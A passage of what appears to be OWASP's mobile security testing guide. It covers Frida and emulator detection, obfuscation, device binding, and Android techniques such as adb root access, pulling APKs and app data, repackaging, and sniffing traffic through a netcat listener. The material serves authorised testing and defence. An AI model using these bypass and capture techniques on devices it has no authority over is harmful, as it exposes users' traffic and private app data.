"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#frida-detection","title":"Frida Detection","text":"Frida runs under the name of frida-server in its default configuration (injected mode) on a jailbroken device. When you explicitly attach to a target app (e.g. via frida-trace or the Frida CLI), Frida injects a frida-agent into the memory of the app. Therefore, you may expect to find it there after attaching to the app (and not before). On Android, verifying this is pretty straightforward as you can simply grep for the string \"frida\" in the memory maps of the process ID in the proc
directory (/proc/<pid>/maps
). However, on iOS the proc
directory is not available, but you can list the loaded dynamic libraries in an app with the function _dyld_image_count
.
Frida may also run in the so-called embedded mode, which also works for non-jailbroken devices. It consists of embedding a frida-gadget into the IPA and forcing the app to load it as one of its native libraries.
The application's static content, including its ARM-compiled binary and its external libraries, is stored inside the <Application>.app
directory. If you inspect the content of the /var/containers/Bundle/Application/<UUID>/<Application>.app
directory, you'll find the embedded frida-gadget as FridaGadget.dylib.
iPhone:/var/containers/Bundle/Application/AC5DC1FD-3420-42F3-8CB5-E9D77C4B287A/SwiftSecurity.app/Frameworks root# ls -alh\ntotal 87M\ndrwxr-xr-x 10 _installd _installd 320 Nov 19 06:08 ./\ndrwxr-xr-x 11 _installd _installd 352 Nov 19 06:08 ../\n-rw-r--r-- 1 _installd _installd 70M Nov 16 06:37 FridaGadget.dylib\n-rw-r--r-- 1 _installd _installd 3.8M Nov 16 06:37 libswiftCore.dylib\n-rw-r--r-- 1 _installd _installd 71K Nov 16 06:37 libswiftCoreFoundation.dylib\n-rw-r--r-- 1 _installd _installd 136K Nov 16 06:38 libswiftCoreGraphics.dylib\n-rw-r--r-- 1 _installd _installd 99K Nov 16 06:37 libswiftDarwin.dylib\n-rw-r--r-- 1 _installd _installd 189K Nov 16 06:37 libswiftDispatch.dylib\n-rw-r--r-- 1 _installd _installd 1.9M Nov 16 06:38 libswiftFoundation.dylib\n-rw-r--r-- 1 _installd _installd 76K Nov 16 06:37 libswiftObjectiveC.dylib\n
Looking at these traces that Frida leaves behind, you might already imagine that detecting Frida would be a trivial task. And while it is trivial to detect these libraries, it is equally trivial to bypass such a detection. Detection of tools is a cat and mouse game and things can get much more complicated. The following table shortly presents a set of some typical Frida detection methods and a short discussion on their effectiveness.
Some of the following detection methods are implemented in the iOS Security Suite.
Method Description Discussion Check The Environment For Related Artifacts Artifacts can be packaged files, binaries, libraries, processes, and temporary files. For Frida, this could be the frida-server running in the target (jailbroken) system (the daemon responsible for exposing Frida over TCP) or the frida libraries loaded by the app. Inspecting running services is not possible for an iOS app on a non-jailbroken device. The Swift method CommandLine is not available on iOS to query for information about running processes, but there are unofficial ways, such as by using NSTask. Nevertheless when using this method, the app will be rejected during the App Store review process. There is no other public API available to query for running processes or execute system commands within an iOS App. Even if it would be possible, bypassing this would be as easy as just renaming the corresponding Frida artifact (frida-server/frida-gadget/frida-agent). Another way to detect Frida, would be to walk through the list of loaded libraries and check for suspicious ones (e.g. those including \"frida\" in their names), which can be done by using_dyld_get_image_name
. Checking For Open TCP Ports The frida-server process binds to TCP port 27042 by default. Testing whether this port is open is another method of detecting the daemon. This method detects frida-server in its default mode, but the listening port can be changed via a command line argument, so bypassing this is very trivial. Checking For Ports Responding To D-Bus Auth frida-server
uses the D-Bus protocol to communicate, so you can expect it to respond to D-Bus AUTH. Send a D-Bus AUTH message to every open port and check for an answer, hoping that frida-server
will reveal itself. This is a fairly robust method of detecting frida-server
, but Frida offers alternative modes of operation that don't require frida-server. Please remember that this table is far from exhaustive. For example, two other possible detection mechanisms are:
Both would help to detect Substrate or Frida's Interceptor but, for example, won't be effective against Frida's Stalker. Remember that the success of each of these detection methods will depend on whether you're using a jailbroken device, the specific version of the jailbreak and method and/or the version of the tool itself. At the end, this is part of the cat and mouse game of protecting data being processed on an uncontrolled environment (the end user's device).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#emulator-detection","title":"Emulator Detection","text":"The goal of emulator detection is to increase the difficulty of running the app on an emulated device. This forces the reverse engineer to defeat the emulator checks or utilize the physical device, thereby barring the access required for large-scale device analysis.
As discussed in the section Testing on the iOS Simulator in the basic security testing chapter, the only available simulator is the one that ships with Xcode. Simulator binaries are compiled to x86 code instead of ARM code and apps compiled for a real device (ARM architecture) don't run in the simulator, hence simulation protection was not so much a concern regarding iOS apps in contrast to Android with a wide range of emulation choices available.
However, since its release, Corellium (commercial tool) has enabled real emulation, setting itself apart from the iOS simulator. In addition to that, being a SaaS solution, Corellium enables large-scale device analysis with the limiting factor just being available funds.
With Apple Silicon (ARM) hardware widely available, traditional checks for the presence of x86 / x64 architecture might not suffice. One potential detection strategy is to identify features and limitations available for commonly used emulation solutions. For instance, Corellium doesn't support iCloud, cellular services, camera, NFC, Bluetooth, App Store access or GPU hardware emulation (Metal). Therefore, smartly combining checks involving any of these features could be an indicator for the presence of an emulated environment.
Pairing these results with the ones from 3rd party frameworks such as iOS Security Suite, Trusteer or a no-code solution such as Appdome (commercial solution) will provide a good line of defense against attacks utilizing emulators.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"The chapter \"Mobile App Tampering and Reverse Engineering\" introduces several well-known obfuscation techniques that can be used in mobile apps in general.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#name-obfuscation","title":"Name Obfuscation","text":"The standard compiler generates binary symbols based on class and function names from the source code. Therefore, if no obfuscation was applied, symbol names remain meaningful and can be easily read straight from the app binary. For instance, a function which detects a jailbreak can be located by searching for relevant keywords (e.g. \"jailbreak\"). The listing below shows the disassembled function JailbreakDetectionViewController.jailbreakTest4Tapped
from the Damn Vulnerable iOS App (DVIA-v2).
__T07DVIA_v232JailbreakDetectionViewControllerC20jailbreakTest4TappedyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
After the obfuscation we can observe that the symbol\u2019s name is no longer meaningful as shown on the listing below.
__T07DVIA_v232zNNtWKQptikYUBNBgfFVMjSkvRdhhnbyyFySbyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
Nevertheless, this only applies to the names of functions, classes and fields. The actual code remains unmodified, so an attacker can still read the disassembled version of the function and try to understand its purpose (e.g. to retrieve the logic of a security algorithm).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#instruction-substitution","title":"Instruction Substitution","text":"This technique replaces standard binary operators like addition or subtraction with more complex representations. For example an addition x = a + b
can be represented as x = -(-a) - (-b)
. However, using the same replacement representation could be easily reversed, so it is recommended to add multiple substitution techniques for a single case and introduce a random factor. This technique is vulnerable to deobfuscation, but depending on the complexity and depth of the substitutions, applying it can still be time consuming.
Control flow flattening replaces original code with a more complex representation. The transformation breaks the body of a function into basic blocks and puts them all inside a single infinite loop with a switch statement that controls the program flow. This makes the program flow significantly harder to follow because it removes the natural conditional constructs that usually make the code easier to read.
The image shows how control flow flattening alters code. See \"Obfuscating C++ programs via control flow flattening\" for more information.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#dead-code-injection","title":"Dead Code Injection","text":"This technique makes the program's control flow more complex by injecting dead code into the program. Dead code is a stub of code that doesn\u2019t affect the original program\u2019s behaviour but increases the overhead for the reverse engineering process.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#string-encryption","title":"String Encryption","text":"Applications are often compiled with hardcoded keys, licences, tokens and endpoint URLs. By default, all of them are stored in plaintext in the data section of an application\u2019s binary. This technique encrypts these values and injects stubs of code into the program that will decrypt that data before it is used by the program.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#recommended-tools","title":"Recommended Tools","text":"Learn more about iOS obfuscation techniques in the paper \"Protecting Million-User iOS Apps with Obfuscation: Motivations, Pitfalls, and Experience\".
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#device-binding","title":"Device Binding","text":"The purpose of device binding is to impede an attacker who tries to copy an app and its state from device A to device B and continue the execution of the app on device B. After device A has been determined trusted, it may have more privileges than device B. This situation shouldn't change when an app is copied from device A to device B.
Since iOS 7.0, hardware identifiers (such as MAC addresses) are off-limits but there are other methods for implementing device binding in iOS:
identifierForVendor
: You can use [[UIDevice currentDevice] identifierForVendor]
(in Objective-C), UIDevice.current.identifierForVendor?.uuidString
(in Swift3), or UIDevice.currentDevice().identifierForVendor?.UUIDString
(in Swift2). The value of identifierForVendor
may not be the same if you reinstall the app after other apps from the same vendor are installed and it may change when you update your app bundle's name. Therefore it is best to combine it with something in the Keychain.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
(if you want to secure the data and properly enforce a passcode or Touch ID requirement), kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
, or kSecAttrAccessibleWhenUnlockedThisDeviceOnly
.Any scheme based on these methods will be more secure the moment a passcode and/or Touch ID is enabled, the materials stored in the Keychain or filesystem are protected with protection classes (such as kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
and kSecAttrAccessibleWhenUnlockedThisDeviceOnly
), and the SecAccessControlCreateFlags
is set either with kSecAccessControlDevicePasscode
(for passcodes), kSecAccessControlUserPresence
(passcode, Face ID or Touch ID), kSecAccessControlBiometryAny
(Face ID or Touch ID) or kSecAccessControlBiometryCurrentSet
(Face ID / Touch ID: but current enrolled biometrics only).
One of the most common things you do when testing an app is accessing the device shell. In this section we'll see how to access the Android shell both remotely from your host computer with/without a USB cable and locally from the device itself.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#remote-shell","title":"Remote Shell","text":"In order to connect to the shell of an Android device from your host computer, adb is usually your tool of choice (unless you prefer to use remote SSH access, e.g. via Termux).
For this section we assume that you've properly enabled Developer Mode and USB debugging as explained in \"Testing on a Real Device\". Once you've connected your Android device via USB, you can access the remote device's shell by running:
adb shell\n
press Control + D or type exit
to quit
Once in the remote shell, if your device is rooted or you're using the emulator, you can get root access by running su
:
bullhead:/ $ su\nbullhead:/ # id\nuid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0\n
Only if you're working with an emulator you may alternatively restart adb with root permissions with the command adb root
so next time you enter adb shell
you'll have root access already. This also allows you to transfer data bidirectionally between your host computer and the Android file system, even to locations that only the root user has access to (via adb push/pull
). See more about data transfer in section \"Host-Device Data Transfer\" below.
If you have more than one device, remember to include the -s
flag followed by the device serial ID on all your adb
commands (e.g. adb -s emulator-5554 shell
or adb -s 00b604081540b7c6 shell
). You can get a list of all connected devices and their serial IDs by using the following command:
adb devices\nList of devices attached\n00c907098530a82c device\nemulator-5554 device\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#connect-to-a-device-over-wi-fi","title":"Connect to a Device over Wi-Fi","text":"You can also access your Android device without using the USB cable. For this you'll have to connect both your host computer and your Android device to the same Wi-Fi network and follow the next steps:
adb tcpip 5555
.adb connect <device_ip_address>
. Check that the device is now available by running adb devices
.adb shell
However, notice that by doing this you leave your device open to anyone on the same network who knows the IP address of your device. You may prefer using the USB connection instead.
For example, on a Nexus device, you can find the IP address at Settings -> System -> About phone -> Status -> IP address or by going to the Wi-Fi menu and tapping once on the network you're connected to.
See the full instructions and considerations in the Android Developers Documentation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#connect-to-a-device-via-ssh","title":"Connect to a Device via SSH","text":"If you prefer, you can also enable SSH access. A convenient option is to use Termux, which you can easily configure to offer SSH access (with password or public key authentication) and start it with the command sshd
(starts by default on port 8022). In order to connect to the Termux via SSH you can simply run the command ssh -p 8022 <ip_address>
(where ip_address
is the actual remote device IP). This option has some additional benefits as it allows to access the file system via SFTP also on port 8022.
While usually using an on-device shell (terminal emulator) such as Termux might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or to check some configuration.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/","title":"Host-Device Data Transfer","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-adb","title":"Using adb","text":"You can copy files to and from a device by using the adb commands adb pull <remote> <local>
and adb push <local> <remote>
commands. Their usage is very straightforward. For example, the following will copy foo.txt
from your current directory (local) to the sdcard
folder (remote):
adb push foo.txt /sdcard/foo.txt\n
This approach is commonly used when you know exactly what you want to copy and from/to where and also supports bulk file transfer, e.g. you can pull (copy) a whole directory from the Android device to your host computer.
$ adb pull /sdcard\n/sdcard/: 1190 files pulled. 14.1 MB/s (304526427 bytes in 20.566s)\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-android-studio-device-file-explorer","title":"Using Android Studio Device File Explorer","text":"Android Studio has a built-in Device File Explorer which you can open by going to View -> Tool Windows -> Device File Explorer.
If you're using a rooted device you can now start exploring the whole file system. However, when using a non-rooted device accessing the app sandboxes won't work unless the app is debuggable and even then you are \"jailed\" within the app sandbox.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-objection","title":"Using objection","text":"This option is useful when you are working on a specific app and want to copy files you might encounter inside its sandbox (notice that you'll only have access to the files that the target app has access to). This approach works without having to set the app as debuggable, which is otherwise required when using Android Studio's Device File Explorer.
First, connect to the app with Objection as explained in \"Recommended Tools - Objection\". Then, use ls
and cd
as you normally would on your terminal to explore the available files:
$ frida-ps -U | grep -i owasp\n21228 sg.vp.owasp_mobile.omtg_android\n\n$ objection -g sg.vp.owasp_mobile.omtg_android explore\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # cd ..\n/data/user/0/sg.vp.owasp_mobile.omtg_android\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls\nType ... Name\n--------- ... -------------------\nDirectory ... cache\nDirectory ... code_cache\nDirectory ... lib\nDirectory ... shared_prefs\nDirectory ... files\nDirectory ... app_ACRA-approved\nDirectory ... app_ACRA-unapproved\nDirectory ... databases\n\nReadable: True Writable: True\n
Once you have a file you want to download you can just run file download <some_file>
. This will download that file to your working directory. The same way you can upload files using file upload
.
...[usb] # ls\nType ... Name\n------ ... -----------------------------------------------\nFile ... sg.vp.owasp_mobile.omtg_android_preferences.xml\n\nReadable: True Writable: True\n...[usb] # file download sg.vp.owasp_mobile.omtg_android_preferences.xml\nDownloading ...\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded ... to sg.vp.owasp_mobile.omtg_android_preferences.xml\n
The downside is that, at the time of this writing, objection does not support bulk file transfer yet, so you're restricted to copying individual files. Still, this can come in handy in some scenarios where you're already exploring the app using objection anyway and find some interesting file. Instead of, for example, taking note of the full path of that file and using adb pull <path_to_some_file>
from a separate terminal, you might just want to directly do file download <some_file>
.
There are several ways of extracting APK files from a device. You will need to decide which one is the easiest method depending if the app is public or private.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#alternative-app-stores","title":"Alternative App Stores","text":"One of the easiest options is to download the APK from websites that mirror public applications from the Google Play Store. However, keep in mind that these sites are not official and there is no guarantee that the application hasn't been repackaged or doesn't contain malware. A few reputable websites that host APKs and are not known for modifying apps and even list SHA-1 and SHA-256 checksums of the apps are:
Beware that you do not have control over these sites and you cannot guarantee what they do in the future. Only use them if it's your only option left.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#using-gplaycli","title":"Using gplaycli","text":"You can use gplaycli to download (-d
) the selected APK by specifying its AppID (add -p
to show a progress bar and -v
for verbosity):
$ gplaycli -p -v -d com.google.android.keep\n[INFO] GPlayCli version 3.26 [Python3.7.4]\n[INFO] Configuration file is ~/.config/gplaycli/gplaycli.conf\n[INFO] Device is bacon\n[INFO] Using cached token.\n[INFO] Using auto retrieved token to connect to API\n[INFO] 1 / 1 com.google.android.keep\n[################################] 15.78MB/15.78MB - 00:00:02 6.57MB/s/s\n[INFO] Download complete\n
The com.google.android.keep.apk
file will be in your current directory. As you might imagine, this approach is a very convenient way to download APKs, especially with regards to automation.
You may use your own Google Play credentials or token. By default, gplaycli will use an internally provided token.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#extracting-the-app-package-from-the-device","title":"Extracting the App Package from the Device","text":"Obtaining app packages from the device is the recommended method as we can guarantee the app hasn't been modified by a third-party. To obtain applications from a rooted or non-rooted device, you can use the following methods:
Use adb pull
to retrieve the APK. If you don't know the package name, the first step is to list all the applications installed on the device:
adb shell pm list packages\n
Once you have located the package name of the application, you need the full path where it is stored on the system to download it.
adb shell pm path <package name>\n
With the full path to the APK, you can now simply use adb pull
to extract it.
adb pull <apk path>\n
The APK will be downloaded in your working directory.
Alternatively, there are also apps like APK Extractor that do not require root and can even share the extracted APK via your preferred method. This can be useful if you don't feel like connecting the device or setting up adb over the network to transfer the file.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#testing-instant-apps","title":"Testing Instant Apps","text":"With Google Play Instant you can create Instant apps which can be instantly launched from a browser or the \"try now\" button from the app store from Android 5.0 (API level 21) onward. They do not require any form of installation. There are a few challenges with an instant app:
The combination of these can lead to insecure decisions, such as: stripping too much of the authorization/authentication/confidentiality logic from an app, which allows for information leakage.
Note: Instant apps require an App Bundle. App Bundles are described in the \"App Bundles\" section of the \"Android Platform Overview\" chapter.
Static Analysis Considerations:
Static analysis can be either done after reverse engineering a downloaded instant app, or by analyzing the App Bundle. When you analyze the App Bundle, check the Android Manifest to see whether dist:module dist:instant=\"true\"
is set for a given module (either the base or a specific module with dist:module
set). Next, check for the various entry points, which entry points are set (by means of <data android:path=\"</PATH/HERE>\" />
).
Now follow the entry points, like you would do for any Activity and check:
Dynamic Analysis Considerations:
There are multiple ways to start the dynamic analysis of your instant app. In all cases, you will first have to install the support for instant apps and add the ia
executable to your $PATH
.
The installation of instant app support is taken care of through the following command:
cd path/to/android/sdk/tools/bin && ./sdkmanager 'extras;google;instantapps'\n
Next, you have to add path/to/android/sdk/extras/google/instantapps/ia
to your $PATH
.
After the preparation, you can test instant apps locally on a device running Android 8.1 (API level 27) or later. The app can be tested in different ways:
Deploy as instant app
checkbox in the Run/Configuration dialog) or deploy the app using the following command:ia run output-from-build-command <app-artifact>\n
try now
button in the App store from the testers account.Now that you can test the app, check whether:
If you need to test on a non-jailbroken device you should learn how to repackage an app to enable dynamic testing on it.
Use a computer to perform all the steps indicated in the article \"Patching Android Applications\" from the objection Wiki. Once you're done you'll be able to patch an APK by calling the objection command:
objection patchapk --source app-release.apk\n
The patched application then needs to be installed using adb, as explained in \"Installing Apps\".
This repackaging method is enough for most use cases. For more advanced repackaging, refer to \"Android Tampering and Reverse Engineering - Patching, Repackaging and Re-Signing\".
"},{"location":"MASTG/techniques/android/MASTG-TECH-0005/","title":"Installing Apps","text":"Use adb install
to install an APK on an emulator or connected device.
adb install path_to_apk\n
Note that if you have the original source code and use Android Studio, you do not need to do this because Android Studio handles the packaging and installation of the app for you.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0006/","title":"Listing Installed Apps","text":"When targeting apps that are installed on the device, you'll first have to figure out the correct package name of the application you want to analyze. You can retrieve the installed apps either by using pm
(Android Package Manager) or by using frida-ps
:
$ adb shell pm list packages\npackage:sg.vantagepoint.helloworldjni\npackage:eu.chainfire.supersu\npackage:org.teamsik.apps.hackingchallenge.easy\npackage:org.teamsik.apps.hackingchallenge.hard\npackage:sg.vp.owasp_mobile.omtg_android\n
You can include flags to show only third party apps (-3
) and the location of their APK file (-f
), which you can use afterwards to download it via adb pull
:
$ adb shell pm list packages -3 -f\npackage:/data/app/sg.vantagepoint.helloworldjni-1/base.apk=sg.vantagepoint.helloworldjni\npackage:/data/app/eu.chainfire.supersu-1/base.apk=eu.chainfire.supersu\npackage:/data/app/org.teamsik.apps.hackingchallenge.easy-1/base.apk=org.teamsik.apps.hackingchallenge.easy\npackage:/data/app/org.teamsik.apps.hackingchallenge.hard-1/base.apk=org.teamsik.apps.hackingchallenge.hard\npackage:/data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk=sg.vp.owasp_mobile.omtg_android\n
This is the same as running adb shell pm path <app_package_id>
on an app package ID:
$ adb shell pm path sg.vp.owasp_mobile.omtg_android\npackage:/data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk\n
Use frida-ps -Uai
to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n----- ---------------------------------------- ---------------------------------------\n 766 Android System android\n21228 Attack me if u can sg.vp.owasp_mobile.omtg_android\n 4281 Termux com.termux\n - Uncrackable1 sg.vantagepoint.uncrackable1\n
Note that this also shows the PID of the apps that are running at the moment. Take a note of the \"Identifier\" and the PID if any as you'll need them afterwards.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/","title":"Exploring the App Package","text":"Once you have collected the package name of the application you want to target, you'll want to start gathering information about it. First, retrieve the APK as explained in \"Basic Testing Operations - Obtaining and Extracting Apps\".
APK files are actually ZIP files that can be unpacked using a standard decompression utility such as unzip
. However, we recommend using apktool which additionally decodes the AndroidManifest.xml and disassembles the app binaries (classes.dex) to smali code:
$ apktool d UnCrackable-Level3.apk\n$ tree\n.\n\u251c\u2500\u2500 AndroidManifest.xml\n\u251c\u2500\u2500 apktool.yml\n\u251c\u2500\u2500 lib\n\u251c\u2500\u2500 original\n\u2502 \u251c\u2500\u2500 AndroidManifest.xml\n\u2502 \u2514\u2500\u2500 META-INF\n\u2502 \u251c\u2500\u2500 CERT.RSA\n\u2502 \u251c\u2500\u2500 CERT.SF\n\u2502 \u2514\u2500\u2500 MANIFEST.MF\n\u251c\u2500\u2500 res\n...\n\u2514\u2500\u2500 smali\n
The following files are unpacked:
As unzipping with the standard unzip
utility leaves some files such as the AndroidManifest.xml
unreadable, it's better to unpack the APK using apktool.
$ ls -alh\ntotal 32\ndrwxr-xr-x 9 sven staff 306B Dec 5 16:29 .\ndrwxr-xr-x 5 sven staff 170B Dec 5 16:29 ..\n-rw-r--r-- 1 sven staff 10K Dec 5 16:29 AndroidManifest.xml\n-rw-r--r-- 1 sven staff 401B Dec 5 16:29 apktool.yml\ndrwxr-xr-x 6 sven staff 204B Dec 5 16:29 assets\ndrwxr-xr-x 3 sven staff 102B Dec 5 16:29 lib\ndrwxr-xr-x 4 sven staff 136B Dec 5 16:29 original\ndrwxr-xr-x 131 sven staff 4.3K Dec 5 16:29 res\ndrwxr-xr-x 9 sven staff 306B Dec 5 16:29 smali\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#the-android-manifest","title":"The Android Manifest","text":"The Android Manifest is the main source of information, it includes a lot of interesting information such as the package name, the permissions, app components, etc.
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the Android Manifest by just inspecting the file or by using grep -i <keyword> AndroidManifest.xml
:
permission
(see \"Android Platform APIs\")android:allowBackup
(see \"Data Storage on Androidactivity
, service
, provider
, receiver
(see \"Android Platform APIs\" and \"Data Storage on Androiddebuggable
(see \"Code Quality and Build Settings of Android Apps\")Please refer to the mentioned chapters to learn more about how to test each of these points.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#app-binary","title":"App Binary","text":"The app binary (classes.dex
) can be found in the root directory of the app package. It is a so-called DEX (Dalvik Executable) file that contains compiled Java code. Due to its nature, after applying some conversions you'll be able to use a decompiler to produce Java code. We've also seen the folder smali
that was obtained after we run apktool. This contains the disassembled Dalvik bytecode in an intermediate language called smali, which is a human-readable representation of the Dalvik executable.
Refer to the section \"Reviewing Decompiled Java Code\" in the chapter \"Tampering and Reverse Engineering on Android\" for more information about how to reverse engineer DEX files.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#compiled-app-binary","title":"Compiled App Binary","text":"In some cases it might be useful to retrieve the compiled app binary (.odex).
First get the path to the app's data directory:
adb shell pm path com.example.myapplication\npackage:/data/app/~~DEMFPZh7R4qfUwwwh1czYA==/com.example.myapplication-pOslqiQkJclb_1Vk9-WAXg==/base.apk\n
Remove the /base.apk
part, add /oat/arm64/base.odex
and use the resulting path to pull the base.odex from the device:
adb root\nadb pull /data/app/~~DEMFPZh7R4qfUwwwh1czYA==/com.example.myapplication-pOslqiQkJclb_1Vk9-WAXg==/oat/arm64/base.odex\n
Note that the exact directory will be different based on your Android version. If the /oat/arm64/base.odex
file can't be found, manually search in the directory returned by pm path
.
You can inspect the lib
folder in the APK:
$ ls -1 lib/armeabi/\nlibdatabase_sqlcipher.so\nlibnative.so\nlibsqlcipher_android.so\nlibstlport_shared.so\n
or from the device with objection:
...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls lib\nType ... Name\n------ ... ------------------------\nFile ... libnative.so\nFile ... libdatabase_sqlcipher.so\nFile ... libstlport_shared.so\nFile ... libsqlcipher_android.so\n
For now this is all information you can get about the native libraries unless you start reverse engineering them, which is done using a different approach than the one used to reverse the app binary as this code cannot be decompiled but only disassembled. Refer to the section \"Reviewing Disassembled Native Code\" in the chapter \"Tampering and Reverse Engineering on Android\" for more information about how to reverse engineer these libraries.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#other-app-resources","title":"Other App Resources","text":"It is normally worth taking a look at the rest of the resources and files that you may find in the root folder of the APK as sometimes they contain additional goodies like key stores, encrypted databases, certificates, etc.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0008/","title":"Accessing App Data Directories","text":"Once you have installed the app, there is further information to explore, where tools like objection come in handy.
When using objection you can retrieve different kinds of information, where env
will show you all the directory information of the app.
$ objection -g sg.vp.owasp_mobile.omtg_android explore\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # env\n\nName Path\n---------------------- ---------------------------------------------------------------------------\ncacheDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/cache\ncodeCacheDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/code_cache\nexternalCacheDirectory /storage/emulated/0/Android/data/sg.vp.owasp_mobile.omtg_android/cache\nfilesDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/files\nobbDir /storage/emulated/0/Android/obb/sg.vp.owasp_mobile.omtg_android\npackageCodePath /data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk\n
Among this information we find:
/data/data/[package-name]
or /data/user/0/[package-name]
/storage/emulated/0/Android/data/[package-name]
or /sdcard/Android/data/[package-name]
/data/app/
The internal data directory is used by the app to store data created during runtime and has the following basic structure:
...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls\nType ... Name\n--------- ... -------------------\nDirectory ... cache\nDirectory ... code_cache\nDirectory ... lib\nDirectory ... shared_prefs\nDirectory ... files\nDirectory ... databases\n\nReadable: True Writable: True\n
Each folder has its own purpose:
However, the app might store more data not only inside these folders but also in the parent folder (/data/data/[package-name]
).
Refer to the \"Testing Data Storage\" chapter for more information and best practices on securely storing sensitive data.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0009/","title":"Monitoring System Logs","text":"On Android you can easily inspect the log of system messages by using Logcat
. There are two ways to execute Logcat:
adb logcat > logcat.log\n
With the following command you can specifically grep for the log output of the app in scope, just insert the package name. Of course your app needs to be running for ps
to be able to get its PID.
adb logcat | grep \"$(adb shell ps | grep <package-name> | awk '{print $2}')\"\n
If you already know the app PID you may give it directly using --pid
flag.
You may also want to apply further filters or regular expressions (using logcat
's regex flags -e <expr>, --regex=<expr>
for example) if you expect certain strings or patterns to come up in the logs.
Remotely sniffing all Android traffic in real-time is possible with tcpdump, netcat (nc), and Wireshark. First, make sure that you have the latest version of Android tcpdump on your phone. Here are the installation steps:
adb root\nadb remount\nadb push /wherever/you/put/tcpdump /system/xbin/tcpdump\n
If execution of adb root
returns the error adbd cannot run as root in production builds
, install tcpdump as follows:
adb push /wherever/you/put/tcpdump /data/local/tmp/tcpdump\nadb shell\nsu\nmount -o rw,remount /system;\ncp /data/local/tmp/tcpdump /system/xbin/\ncd /system/xbin\nchmod 755 tcpdump\n
In certain production builds, you might encounter an error mount: '/system' not in /proc/mounts
.
In that case, you can replace the above line $ mount -o rw,remount /system;
with $ mount -o rw,remount /
, as described in this Stack Overflow post.
Remember: To use tcpdump, you need root privileges on the phone!
Execute tcpdump
once to see if it works. Once a few packets have come in, you can stop tcpdump by pressing CTRL+c.
$ tcpdump\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes\n04:54:06.590751 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n04:54:09.659658 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n04:54:10.579795 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n^C\n3 packets captured\n3 packets received by filter\n0 packets dropped by kernel\n
To remotely sniff the Android phone's network traffic, first execute tcpdump
and pipe its output to netcat
(nc):
tcpdump -i wlan0 -s0 -w - | nc -l -p 11111\n
The tcpdump command above involves
-
, which will make tcpdump write to stdout.By using the pipe (|
), we sent all output from tcpdump to netcat, which opens a listener on port 11111. You'll usually want to monitor the wlan0 interface. If you need another interface, list the available options with the command $ ip addr
.
To access port 11111, you need to forward the port to your host computer via adb.
adb forward tcp:11111 tcp:11111\n
The following command connects you to the forwarded port via netcat and piping to Wireshark.
nc localhost 11111 | wireshark -k -S -i -\n
Wireshark should start immediately (-k). It gets all data from stdin (-i -) via netcat, which is connected to the forwarded port. You should see all the phone's traffic from the wlan0 interface.
You can display the captured traffic in a human-readable format with Wireshark. Figure out which protocols are used and whether they are unencrypted. Capturing all traffic (TCP and UDP) is important, so you should execute all functions of the tested application and analyze it.
This neat little trick now allows you to identify what kinds of protocols are used and which endpoints the app is talking to. The question now is, how can I test the endpoints if Burp is not capable of showing the traffic? There is no easy answer for this, but there are a few Burp plugins that can get you started.
